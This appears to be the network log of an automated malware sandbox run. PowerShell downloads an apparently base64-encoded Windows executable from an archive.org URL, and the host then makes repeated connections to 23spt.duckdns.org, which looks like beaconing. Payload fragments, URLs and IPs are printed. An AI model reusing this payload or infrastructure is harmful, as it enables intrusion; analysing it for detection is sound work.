                                                Sep 26, 2024 10:59:22.453241110 CEST300061773191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:24.067512989 CEST300061773191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:24.067648888 CEST617733000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:24.067760944 CEST617733000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:24.072540045 CEST300061773191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:25.079657078 CEST617743000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:25.084687948 CEST300061774191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:25.084816933 CEST617743000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:25.085206985 CEST617743000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:25.090033054 CEST300061774191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:26.723484039 CEST300061774191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:26.723566055 CEST617743000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:26.723603010 CEST617743000192.168.2.7191.93.114.27
                                                Sep 26, 2024 10:59:26.728413105 CEST300061774191.93.114.27192.168.2.7
                                                Sep 26, 2024 10:59:28.357956886 CEST617753000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:28.362797976 CEST300061775181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:28.362874031 CEST617753000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:28.363151073 CEST617753000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:28.367902994 CEST300061775181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:29.990557909 CEST300061775181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:29.993961096 CEST617753000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:29.993985891 CEST617753000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:29.998840094 CEST300061775181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:31.001082897 CEST617763000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:31.005990028 CEST300061776181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:31.009990931 CEST617763000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:31.010229111 CEST617763000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:31.015084982 CEST300061776181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:32.625334978 CEST300061776181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:32.628616095 CEST617763000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:32.628635883 CEST617763000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:32.633501053 CEST300061776181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:33.641801119 CEST617773000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:33.646617889 CEST300061777181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:33.649971008 CEST617773000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:33.650279999 CEST617773000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:33.655067921 CEST300061777181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:35.289980888 CEST300061777181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:35.292732000 CEST617773000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:35.296528101 CEST617773000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:35.301330090 CEST300061777181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:36.298219919 CEST617783000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:36.303046942 CEST300061778181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:36.305958986 CEST617783000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:36.306184053 CEST617783000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:36.310972929 CEST300061778181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:37.908283949 CEST300061778181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:37.908416986 CEST617783000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:37.908463955 CEST617783000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:37.913311005 CEST300061778181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:38.923027992 CEST617793000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:38.927876949 CEST300061779181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:38.930010080 CEST617793000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:38.930246115 CEST617793000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:38.935323000 CEST300061779181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:40.572643042 CEST300061779181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:40.572833061 CEST617793000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:40.572875977 CEST617793000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:40.578016996 CEST300061779181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:41.579215050 CEST617803000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:41.584994078 CEST300061780181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:41.585083961 CEST617803000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:41.585341930 CEST617803000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:41.590183020 CEST300061780181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:43.203407049 CEST300061780181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:43.204709053 CEST617803000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:43.204750061 CEST617803000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:43.209546089 CEST300061780181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:44.220181942 CEST617813000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:44.225778103 CEST300061781181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:44.225836992 CEST617813000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:44.226100922 CEST617813000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:44.231693029 CEST300061781181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:45.894486904 CEST300061781181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:45.894772053 CEST617813000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:45.894772053 CEST617813000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:45.903860092 CEST300061781181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:46.907387972 CEST617823000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:46.912230015 CEST300061782181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:46.912322998 CEST617823000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:46.912573099 CEST617823000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:46.917360067 CEST300061782181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:48.543062925 CEST300061782181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:48.543200016 CEST617823000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:48.543257952 CEST617823000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:48.548187017 CEST300061782181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:49.548044920 CEST617833000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:49.552943945 CEST300061783181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:49.553031921 CEST617833000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:49.553390980 CEST617833000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:49.558176994 CEST300061783181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:51.190828085 CEST300061783181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:51.190891981 CEST617833000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:51.190934896 CEST617833000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:51.196404934 CEST300061783181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:52.204915047 CEST617843000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:52.209765911 CEST300061784181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:52.209851027 CEST617843000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:52.210128069 CEST617843000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:52.215204000 CEST300061784181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:53.838659048 CEST300061784181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:53.841981888 CEST617843000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:53.842022896 CEST617843000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:53.846935034 CEST300061784181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:54.814148903 CEST617853000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:54.819088936 CEST300061785181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:54.819199085 CEST617853000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:54.821537018 CEST617853000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:54.826420069 CEST300061785181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:56.461858988 CEST300061785181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:56.461932898 CEST617853000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:56.462013960 CEST617853000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:56.466866016 CEST300061785181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:57.407445908 CEST617863000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:57.412575006 CEST300061786181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:57.413989067 CEST617863000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:57.414266109 CEST617863000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:57.419142962 CEST300061786181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:59.016433001 CEST300061786181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:59.016494036 CEST617863000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:59.016534090 CEST617863000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:59.021406889 CEST300061786181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:59.923749924 CEST617873000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:59.928864002 CEST300061787181.236.206.3192.168.2.7
                                                Sep 26, 2024 10:59:59.928945065 CEST617873000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:59.929301977 CEST617873000192.168.2.7181.236.206.3
                                                Sep 26, 2024 10:59:59.934212923 CEST300061787181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:01.551357031 CEST300061787181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:01.551455975 CEST617873000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:01.551456928 CEST617873000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:01.556349039 CEST300061787181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:02.439866066 CEST617883000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:02.444966078 CEST300061788181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:02.446012020 CEST617883000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:02.446239948 CEST617883000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:02.451276064 CEST300061788181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:04.065682888 CEST300061788181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:04.066009045 CEST617883000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:04.066082001 CEST617883000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:04.070851088 CEST300061788181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:04.923211098 CEST617893000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:04.928343058 CEST300061789181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:04.930022001 CEST617893000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:04.930283070 CEST617893000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:04.935117960 CEST300061789181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:06.570252895 CEST300061789181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:06.570374966 CEST617893000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:06.572657108 CEST617893000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:06.577409983 CEST300061789181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:07.392079115 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:07.396977901 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:07.397047043 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:07.397404909 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:07.403101921 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:09.854507923 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:09.854571104 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:09.854604006 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:09.854636908 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:09.854636908 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:09.855309963 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:09.855321884 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:09.855364084 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:09.855446100 CEST617903000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:09.859812975 CEST300061790181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:10.657982111 CEST617913000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:10.663063049 CEST300061791181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:10.663245916 CEST617913000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:10.663470030 CEST617913000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:10.668687105 CEST300061791181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:12.312352896 CEST300061791181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:12.312747002 CEST617913000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:12.312747002 CEST617913000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:12.319816113 CEST300061791181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:13.080305099 CEST617923000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:13.090714931 CEST300061792181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:13.090830088 CEST617923000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:13.091330051 CEST617923000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:13.099301100 CEST300061792181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:14.721780062 CEST300061792181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:14.721898079 CEST617923000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:14.721899033 CEST617923000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:14.735202074 CEST300061792181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:15.470689058 CEST617933000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:15.477051973 CEST300061793181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:15.477145910 CEST617933000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:15.477385998 CEST617933000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:15.483277082 CEST300061793181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:17.164985895 CEST300061793181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:17.165115118 CEST617933000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:17.165147066 CEST617933000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:17.169893026 CEST300061793181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:17.900069952 CEST617943000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:18.735816002 CEST300061794181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:18.735898972 CEST617943000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:18.736169100 CEST617943000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:18.741259098 CEST300061794181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:20.404341936 CEST300061794181.236.206.3192.168.2.7
                                                Sep 26, 2024 11:00:20.404536009 CEST617943000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:20.404638052 CEST617943000192.168.2.7181.236.206.3
                                                Sep 26, 2024 11:00:20.409359932 CEST300061794181.236.206.3192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 26, 2024 10:58:17.536271095 CEST6137653192.168.2.71.1.1.1
                                                Sep 26, 2024 10:58:17.685606956 CEST53613761.1.1.1192.168.2.7
                                                Sep 26, 2024 10:58:21.371325970 CEST5865253192.168.2.71.1.1.1
                                                Sep 26, 2024 10:58:21.381627083 CEST53586521.1.1.1192.168.2.7
                                                Sep 26, 2024 10:58:22.907937050 CEST6425853192.168.2.71.1.1.1
                                                Sep 26, 2024 10:58:23.921988010 CEST6425853192.168.2.71.1.1.1
                                                Sep 26, 2024 10:58:24.922192097 CEST6425853192.168.2.71.1.1.1
                                                Sep 26, 2024 10:58:24.929908991 CEST53642581.1.1.1192.168.2.7
                                                Sep 26, 2024 10:58:26.917797089 CEST53642581.1.1.1192.168.2.7
                                                Sep 26, 2024 10:58:26.917850018 CEST53642581.1.1.1192.168.2.7
                                                Sep 26, 2024 10:59:27.735407114 CEST4987353192.168.2.71.1.1.1
                                                Sep 26, 2024 10:59:28.356146097 CEST53498731.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Sep 26, 2024 10:58:17.536271095 CEST192.168.2.71.1.1.10x5aceStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:21.371325970 CEST192.168.2.71.1.1.10x51a5Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:22.907937050 CEST192.168.2.71.1.1.10xd4ddStandard query (0)23spt.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:23.921988010 CEST192.168.2.71.1.1.10xd4ddStandard query (0)23spt.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:24.922192097 CEST192.168.2.71.1.1.10xd4ddStandard query (0)23spt.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:59:27.735407114 CEST192.168.2.71.1.1.10x4f3fStandard query (0)23spt.duckdns.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 26, 2024 10:58:17.685606956 CEST1.1.1.1192.168.2.70x5aceNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:21.381627083 CEST1.1.1.1192.168.2.70x51a5No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:21.381627083 CEST1.1.1.1192.168.2.70x51a5No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:26.917797089 CEST1.1.1.1192.168.2.70xd4ddServer failure (2)23spt.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:58:26.917850018 CEST1.1.1.1192.168.2.70xd4ddServer failure (2)23spt.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                Sep 26, 2024 10:59:28.356146097 CEST1.1.1.1192.168.2.70x4f3fNo error (0)23spt.duckdns.org181.236.206.3A (IP address)IN (0x0001)false
                                                • ia600100.us.archive.org
                                                • paste.ee
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749703207.241.227.2404436488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 08:58:18 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                Host: ia600100.us.archive.org
                                                Connection: Keep-Alive
                                                2024-09-26 08:58:18 UTC606INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Thu, 26 Sep 2024 08:58:18 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 2823512
                                                Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                Connection: close
                                                ETag: "66e22cba-2b1558"
                                                Strict-Transport-Security: max-age=15724800
                                                Expires: Thu, 26 Sep 2024 14:58:18 GMT
                                                Cache-Control: max-age=21600
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                Access-Control-Allow-Credentials: true
                                                Accept-Ranges: bytes
                                                2024-09-26 08:58:18 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                2024-09-26 08:58:18 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                2024-09-26 08:58:18 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                2024-09-26 08:58:18 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                2024-09-26 08:58:18 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
